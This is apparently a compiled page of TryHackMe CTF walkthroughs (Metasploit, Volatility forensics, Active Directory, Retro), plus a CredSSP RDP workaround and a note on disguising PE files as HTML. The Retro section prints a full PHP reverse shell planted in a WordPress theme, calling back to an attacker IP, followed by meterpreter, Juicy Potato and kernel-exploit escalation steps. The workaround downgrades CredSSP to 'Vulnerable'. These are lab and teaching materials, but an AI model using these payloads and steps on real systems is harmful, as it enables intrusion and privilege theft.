thm-linuxprivesc-nl


 Tasks

Active Machine Information
Title

Linux PrivEsc

IP Address

10.10.39.58

Expires

1h 24m 50s

 
100%

thm-rpmetasploit-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called RPMetasploit at

https://tryhackme.com/room/rpmetasploit

Image for post

[Task 1] Intro

msfdb init

Image for post

[Task 2] Initializing…

Read the above.
msfconsole -h

Image for post

-q

Image for post

msfconsole

Image for post

db_status

Image for post

postgresql

[Task 3] Rock ’em to the Core [Commands]

help
?
search
use
info
connect
banner
set
setg
get
unset
spool
save

[Task 4] Modules for Every Occasion!

exploit
payload
auxiliary
post
encoder 
NOP
load

[Task 5] Move that shell!

db_nmap -sV [IP]

Image for post

msrpc.
Image for post

Image for post

hosts

Image for post

services

Image for post

vulns
use icecast

Image for post

exploit/windows/http/icecast_header
search multi/handler

Image for post

#
use 6

Image for post

set PAYLOAD windows/meterpreter/reverse_tcpset 
LHOST tun0

Image for post

use icecast
set RHOST [ip]

Image for post

run -j

Image for post

jobs
sessions
sessions -i 1

Image for post

[Task 6] We’re in, now what?

ps

Image for post

spoolsv.exe
migrate
getuid

Image for post

sysinfo

Image for post

load kiwi

Image for post

getprivs

Image for post

upload
run
ipconfig

Image for post

run post/windows/gather/checkvm

Image for post

run post/multi/recon/local_exploit_suggester

Image for post

run post/windows/manage/enable_rdp
shell

Image for post

[Task 7] Makin’ Cisco Proud

run autoroute -h

Image for post

run autoroute -s 172.18.1.0 -n 255.255.255.0

Image for post

search server/socks4a

Image for post

proxychains

.

 

thm-forensics-nl

[Hacking walkthrough] Forensics with volatility

[Hacking walkthrough] Forensics with volatility

Another day, another write-up on tryhackme challenge. Today, I going to show you a forensic challenge created by user whiteheart. This forensic challenge is a bit special when compared with the last CTF challenge. This challenge is about finding information inside a memory dump. For your information, there is a lot of forensic tools available on the Internet and volatility is one of the forensic tools that specialized in-memory analysis. The memory that I referred here is Random Access Memory (RAM) a.k.a volatile memory. An image of the volatile memory can hold various information that can help with an investigation. Information such as services, network activity, processes, user activity, and even password can be found within the image. For this instance, I am going to use the pre-installed volatility forensic tool inside the Kali Linux.

Task 1: Information gather

Task 1-1: Download the image file

First and foremost, download the image file before proceeding the challenge. The file size is about 438,371 KB. Most sure the unzipped image file match the given MD5 hash.

Task 1-2: Identify the OS

After that, launch your volatility help menu with the following command.

$ volatility -h

Scroll down the terminal and you will see tons of plugin commands. These commands are important as we are going to use it throughout the entire challenge. It is better if you roughly go through the commands and the description.

To perform the first scan on the memory image, we are going to use the following command.

$ volatility -f victim.raw imageinfo

After a jiff, the image’s information will be presented on your terminal. It seems that the victim is running on windows OS. However, we are unable to determine the exact Windows version where it can be either Windows 7 or Windows Server 2008. Either way, the result does not affect our next task.

Answer: windows

Task 1-3: Looking for ‘SearchIndexer’ PID

You can either use ‘pslist’ or ‘psscan’ to complete this task. The difference is pslist only lists out the running process while psscan scan and list out all the running and terminated process.

$ volatility -f victim.raw --profile=Win7SP1x64 pslist
$ volatility -f victim.raw --profile=Win7SP1x64 psscan

Answer: 2180

Task 1-4: Last accessed directory

‘Shellbags’ plugin command can be used to gather all the information about a viewed directory such as size, position, and icon. Using this command, we are able to track down the folder accessed by the user. Hence, it reduced the search time.

The ‘deleted_file’ is the last directory accessed by the user.

Answer: deleted_files

Task 2: Search for malicious processes

I am going to dig a little deeper on the memory image. This time we are going to look for the malicious processes running on the victim’s machine.

Task 2-1: Suspicious ports

By looking at the volatility help menu, you are supposedly able to scan the open port using ‘connections’ and ‘connscan’. However, both plugin commands only restricted to Windows XP and Windows server 2003. Luckily I found another way to scan the open ports using ‘netscan’ after reading this article. Let ‘s scan the open port using the following command

$ volatility -f victim.raw --profile=Win7SP1x64 netscan

After that, I summarized the scan in the table below.

PID Open port Comment
4 TCP:5357, TCP:445, UDP:138, UDP:137,TCP:2869 System open port
416 TCP:49152
504 TCP:49156
512 TCP:49155
752 TCP:135 Samba
688 Vbox
852 TCP:49153
920 TCP:49154
1004 UDP:5355
1368 UDP:59471, UDP:59471, UDP:3702, UDP:1900, UDP:61556, UDP:61555 Suspicious
2464 UDP:5005, UDP:5004, TCP:554 Suspicious

Looks like PID 1368 and PID 2464 with multiple ports which look suspicious to us. How about the PPID of both processes?

Both processes are came from the same PPID. Definitely suspicious.

Answer: UDP:5005 (there are multiple answers for this task but the hint was saying the first one)

Task 2-2: Another suspicious process

We have identified PID 1368 and PID 2464 are malicious processes. There are other malicious processes still hiding inside the memory file which is yet to be discovered by us. How about revisiting the psscan?

The explorer.exe process is a suspicious process. This is because of the PPID of the explore.exe is nowhere to be found in the PID. Which process started the explorer.exe? The answer is unknown. However, this can not conclude that explorer.exe is a malicious process. How about we check for the process command line?

$ volatility -f victim.raw --profile=Win7SP1x64 cmdline

Look like the explorer.exe execute in the correct directory. How about dump the process and check with Virus total?

$ volatility -f victim.raw -p 1860 --profile=Win7SP1x64 procdump <Directory to save the file>

The file is clean on Virus total scan. Is this the end? Well, I don’t think so. There is another plugins command to check for the malware inside the memory file. The command named as ‘malfind’

$ volatility -f victim.raw --profile=Win7SP1x64 malfind

Now we are talking. The explorer.exe is executing protection which indicates the process is malicious. In the process of checking the malfind log, I stumble across PID 2464 which double confirm our previous finding. In addition, PID 1820 shows malicious sign. We are now identified four malicious PID which are 1368, 1464, 1860 and 1820.

Answer: 1860;1820;2464

Task 3: Indicators of compromise (IOC)

IOC are pieces of forensic data found inside the system entries log and files. This data is then used to identify malicious activity. Since we have identified all the malicious process on the previous task, we can dump the memory of to process to identify the malicious activity. We can dump the memory using the following command

$ volatility -f victim.raw -p <malicious PID> --profile=Win7SP1x64 memdump <Directory to save the file>

Out of 4 malicious dump files, we are only interested in 1820.dmp. This is because of the dump file answering all the questions in the following tasks.

Task 3-1: The first URL

With the given hint, you can easily obtain the answer using grep wildcard.

$ strings 1820.dmp | grep '\<www\.go....\.ru\>'

Answer: www.goporn.ru (DO not visit the site)

Task 3-2: The second URL

Similarly to the previous task.

$ strings 1820.dmp | grep '\<www\.i....\.com\>'

Answer: www.ikaka.com

Task 3-3: The third URL

Similarly to the task 3-1.

$ strings 1820.dmp | grep '\<www\.ic......\.com\>'

Answer: www.icsalabs.com

Task 3-4: The first IP address

I guess you know the way.

$ strings 1820.dmp | grep '\<202\....\.233\....\>'

Answer: 202.107.233.211

Task 3-5: The second IP address

I don’t have to repeat it again.

$ strings 1820.dmp | grep '\<...\.200\...\.164\>'

Answer: 209.200.12.164

Task 3-6: The third IP address

You know what to do.

$ strings 1820.dmp | grep '\<209\.190\....\....\>'

Answer: 209.190.122.186

Task 3-7: The unique environment variable

To check with the environment variable from the memory image, you can use envars plugin command on PID 2464.

$ volatility -f victim.raw -p 2464 --profile=Win7SP1x64 envars

We found something extraordinary from the environment variable.

Answer: OANOCACHE

Conclusion

That’s all for the forensics challenge with volatility tools. In this forensic challenge, we learn how to extract information from the memory dump, analyse the malicious process and extracting domains from the dump file.

memorydump reader for windows

from https://www.fireeye.com/services/freeware/redline-download-confirmation.html

 

thm-activedirectorybasics-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called activedirectorybasics at

https://tryhackme.com/room/activedirectorybasics


 Tasks

Title

Windows Server

IP Address

10.10.139.145

Expires

45m 57s

 
100%

Active Directory is the directory service for Windows Domain Networks. It is used by many of today’s top companies and is a vital skill to comprehend when attacking Windows.

It is recommended to have knowledge of basic network services, Windows, networking, and Powershell.

The detail of specific uses and objects will be limited as this is only a general overview of Active Directory. For more information on a specific topic look for the corresponding room or do your own research on the topic.

Caylent Isometric Illustration by Felix Oppenheimer on Dribble

What is Active Directory? –

Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network. Active Directory contains many functioning bits and pieces, a majority of which we will be covering in the upcoming tasks. To outline what we’ll be covering take a look over this list of Active Directory components and become familiar with the various pieces of Active Directory:

  • Domain Controllers
  • Forests, Trees, Domains
  • Users + Groups
  • Trusts
  • Policies
  • Domain Services

All of these parts of Active Directory come together to make a big network of machines and servers. Now that we know what Active Directory is let’s talk about the why?

Why use Active Directory? –

The majority of large companies use Active Directory because it allows for the control and monitoring of their user’s computers through a single domain controller. It allows a single user to sign in to any computer on the active directory network and have access to his or her stored files and folders in the server, as well as the local storage on that machine. This allows for any user in the company to use any machine that the company owns, without having to set up multiple users on a machine. Active Directory does it all for you.

Now what we know the what and the why of Active Directory let’s move on to how it works and functions.


#1 I understand what Active Directory is and why it is used.

The physical Active Directory is the servers and machines on-premise, these can be anything from domain controllers and storage servers to domain user machines; everything needed for an Active Directory environment besides the software.

Image Credit

Domain Controllers –

A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory — they control the rest of the domain. I will outline the tasks of a domain controller below:

  • holds the AD DS data store
  • handles authentication and authorization services
  • replicate updates from other domain controllers in the forest
  • Allows admin access to manage domain resources

Image Credit

AD DS Data Store –

The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. Below is an outline of some of the contents and characteristics of the AD DS Data Store:

  • Contains the NTDS.dit – a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
  • Stored by default in %SystemRoot%\NTDS
  • accessible only by the domain controller

That is everything that you need to know in terms of physical and on-premise Active Directory. Now move on to learn about the software and infrastructure behind the network.


#1 What database does the AD DS contain?
#2 Where is the NTDS.dit stored?
#3 What type of machine can be a domain controller?

thm-retro-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called Retro at

https://tryhackme.com/room/retro

Tasks

100%

Can you time travel? If not, you might want to think about the next best thing.
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
————————————-
There are two distinct paths that can be taken on Retro. One requires significantly less trial and error, however, both will work. Please check writeups if you are curious regarding the two paths. An alternative version of this room is available in it’s remixed version Blaster.

#1 A web server is running on the target. What is the hidden directory which the website lives on?
#2  50 user.txt
#3  100 root.txt

We won’t get any response for any ping request, nmap does have a flag for that -nP

sudo nmap -Pn -sV -p- -vv <target-machine>

After the quick scan we did on our target, we can see that it is a IIS Windows Server, port 80 is running an http server and we have port 3389 that can allow us to get a remote desktop {RDP}

So we visited the port 80, found the landing page of windows server kept digging for directories the only one that is available is /retro or /Retro, it doesn’t matter.

the first thing got my eye is the User who shared the article in this site “Wade” I clicked on the user it showed me all the articles shared by the user, it felt like a wordpress but I wanted to make sure that it is! I ran another directory scan in the directory /retro to see if we have anything, but before that, a comment got my eye.

It looks like our user Wade doesn’t have a very good memory so he left us a little note in a comment on one of his articles.

 

We consider that ‘parzival‘ is a password of the user wade, we use the RDP service of the machine to use this information. but we fail with a certificate error -> see below how to fix this.

Next let’s jump to wp-login.php and use the username we have and the note the user left just in case he forgets it, maybe its a bluff or maybe a hint for the password.

well guess what it is the password for the user, the next part of the logging, I got too excited and forgot to take screenshots, so the step after I created a php reverse shell with msfvenom and went to the theme editor in the dashboard, used the 404.php to insert my php code opened metasploit set up my settings and ran the listener and we got a shell

msfvenom -p php/reverse_php LHOST=10.11.3.122 LPORT=9876 -f raw > phpreverseshell.php

so http://10.10.25.91/retro/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen looks like this

<?php
/*<?php /**/
@error_reporting(0);
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}

$ipaddr='10.11.3.122';
$port=9876;

if(!function_exists('KhALHACs')){
function KhALHACs($c){
global $dis;

if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\n";
}
$DGPge='is_callable';
$VJMGOUL='in_array';

if($DGPge('popen')and!$VJMGOUL('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($DGPge('exec')and!$VJMGOUL('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($DGPge('system')and!$VJMGOUL('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($DGPge('proc_open')and!$VJMGOUL('proc_open',$dis)){
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($DGPge('passthru')and!$VJMGOUL('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($DGPge('shell_exec')and!$VJMGOUL('shell_exec',$dis)){
$o=shell_exec($c);
}else
{
$o=0;
}

return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://10.11.3.122",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=KhALHACs(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=KhALHACs(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}

?>

.

then we browse to http://10.10.25.91/retro/wp-content/themes/twentyseventeen/404.php to trigger our shell

E:\PENTEST>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.25.91] 50079
hostname
RetroWeb
whoami
nt authority\iusr

better we use a meterpreter shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.3.122 LPORT=9876 -f raw > shell.php
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > set lhost 10.11.3.122
lhost => 10.11.3.122
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.11.3.122:9876
[*] Sending stage (180291 bytes) to 10.10.25.91

 

Privilege escalation time

It is a windows machine so i ran Windows-Exploit-Suggester made by Aon’s Cyber Labs it’s a very powerful python script and straight forward so I saved the systeminfo of the machine, ran the command and got all the exploits that can be used for this specific version of window server, in the command I added at the end -l to tell our script to find local exploits, because we want Administrator user

python windows-exploit-suggester.py --database <xls database  of exploits provided with the script> --systeminfor <systeminfo saved in a txt file> --ostext <Os> -l

Let’s use MS16-075, as we can see the bug is considered a medium risk because you need to have access first to the machine and then exploit it if you want to read more about this vulnerability click MS16-075

metasploit does have the exploit there, all you have to do is use the exploit look at the options, one of the requirements is a session in metasploit that we already have you set the number of the session, run the exploit and we have a shell running NT AUTHORITY\SYSTEM.

Post-exploitation

There are a few ways to achieve SYSTEM here. The intended method, didn’t work for me at 1st try. What also worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.

whoami /all

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

We have SeImpersonatePrivilege privileges. So that means we can use Juicy Potato. Call it like this

JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

We should get a SYSTEM shell

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv && ipconfig
whoami /priv && ipconfig

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5
   IPv4 Address. . . . . . . . . . . : 10.10.218.121
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586
   Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal

The machine is a Windows 2016 server.

Image for post

Open the file and you’ll have your first flag.


But how do we get the privilege escalation?!

Pretty easy actually. Check out this site

swisskyrepo/PayloadsAllTheThings

Extract patchs and updates Architecture List all env variables List all drives Get current username List user privilege…

github.com

You’ll find a link to an exploit for https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213

On your Kali machine, go and download the zip file for the x64 architecture.

Image for post

Unzip the executable and start a simple web server using Python

Image for post

Now on the Windows 2016 server simply browse to your web server and download the executable

Image for post

The machine may complain about the file and asking if you want to discard it, of course you want to keep it.

Now simply run the executable as the user wade and you’ll be presented with an elevated administrator command prompt. Go and get your root.txt file..

Image for post

Mission complete.


c:\Users\Wade\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 7443-948C

 Directory of c:\Users\Wade\Desktop

07/29/2020  07:00 AM    <DIR>          .
07/29/2020  07:00 AM    <DIR>          ..
11/27/2019  08:18 PM           732,344 hhupd.exe
12/08/2019  09:09 PM                32 user.txt.txt
               2 File(s)        732,376 bytes
               2 Dir(s)  30,394,126,336 bytes free

c:\Users\Wade\Desktop>type user.txt.txt
3b99fbdc6d430bfb51c72c651a261927
c:\Users\Wade\Desktop>

c:\Users\Administrator\Desktop>type root.txt.txt
7958b569565d7bd88d10c6f22d1c4063
c:\Users\Administrator\Desktop>

 

I had big problems with

[Solved] CredSSP Encryption Oracle Remediation

A remote code execution vulnerability exists in the Credential Security Support Provider protocol (CredSSP). An attacker who successfully exploited this vulnerability could relay user credentials and use them to execute code on the target system.

CredSSP is an authentication provider which processes authentication requests for other applications; any application which depends on CredSSP for authentication may be vulnerable to this type of attack.

As an example of how an attacker could exploit this vulnerability against Remote Desktop Protocol, the attacker would need to run a specially crafted application and perform a man-in-the-middle attack against a Remote Desktop Protocol session. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

The security update addresses the vulnerability by correcting how Credential Security Support Provider protocol (CredSSP) validates requests during the authentication process.

1. SCENARIO

2. RDP SESSION

An update released by Microsoft (KB 4093492)on May 8, 2018, for Windows 10 Operation System was targeted to change the default settings CredSSP from Vulnerable to Mitigated.

A full list of the update and patches for all platform can be obtained from here.

However, post patching this caused an issue where the patched clients were blocked from communicating with unpatched servers over RDP protocols.

This has been reported to cause an error thrown by Windows RDP as below:

[Solved] CredSSP Encryption Oracle Remediation

3. WORKAROUND

Use the group policy settings changes described below to rollback the changes to ‘Vulnerable’ state to allow RDP access.

1. Open Group Policy Editor, by executing gpedit.msc

2. Policy path: Computer Configuration -> Administrative Templates -> System -> Credentials Delegation

Run gpedit.msc and expand Administrative Templates

Expand System

[Solved] CredSSP Encryption Oracle Remediation

Expand Credential Delegation

[Solved] CredSSP Encryption Oracle Remediation

Edit Encryption Oracle Remediation

[Solved] CredSSP Encryption Oracle Remediation

Select Enabled and change Production Level to Vulnerable

[Solved] CredSSP Encryption Oracle Remediation

3. Run the command gpupdate /force to apply group policy settings.

4. Your remote desktop connection will be working fine now.

CONCLUSION

This is just a workaround and defeats the purpose of the patching. However, we need to ensure that future updates are installed as and when released by Microsoft so that the vulnerability is not exposed.

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\ /v AllowEncryptionOracle /t REG_DWORD /d 2

Windows 10 Pro
July, 2020

Author : Puckiestyle

 

Protected: htb-buff-nl

This content is password protected. To view it please enter your password below:

Posted on

hacking-the-world-with-html

In my previous article Exploring the MS-DOS header I stated that after experimenting, the Windows loader only cares about the e_magic and the e_lfanew members from the _IMAGE_DOS_HEADER. Because the rest of the members of the DOS header is used by MS-DOS to execute the stub program. Check it out if you have not.
If you take a PE file and null out the MS-DOS header and the MS-DOS stub program leaving out the e_magic and the e_lfanew values, the PE will still work fine as the rest is not needed by the Windows PE loader. The e_lfanew address at offset 0x3c is important as it points to the beginning of the _IMAGE_NT_HEADERS structure which is the actual start of the PE file.

Since those values are not important we can insert an HTML comment from offset 0x2 which is the e_cblp value and begin an HTML comment and end the comment at the end of the PE and append our HTML/PHP/ASP/JSP file contents.

I wrote a simple program in C to automate this task. You can provide your PE file and the HTML/PHP/ASP/JSP file to inject and it will generate an HTML file. You can rename the file into the extension you desire.

https://github.com/OsandaMalith/PE2HTML

Another thing to note is that in Windows, cmd.exe and rundll32 will treat any file with any extension as a valid PE as long as it begins with the IMAGE_DOS_SIGNATURE.

By abusing these Windows features (bugs) we can execute our HTML files as executables as well as run in the web browser displaying HTML/PHP/ASP/JSP content.

You can run the newly created PE file with HTML extension or with any extension using cmd.

cmd /c file.html

Process explorer output would look like this.

Rundll32 does not validate any extensions, therefore you can execute any DLL with any extension.

By combining these features (bugs) an attacker can achieve social engineering. This won’t bypass any AV or any EDR. But will surely confuse the analyzer. Might be a handy trick to use at the last stage once your payload is undetectable.

A checksum check can be used to prevent attackers from modifying the MS-DOS header. But a skilled reverse engineer may find the checksum routine and patch it to bypass the anti-reversing technique.

The author takes no responsibility for any damage you cause. This is strictly written for educational purposes.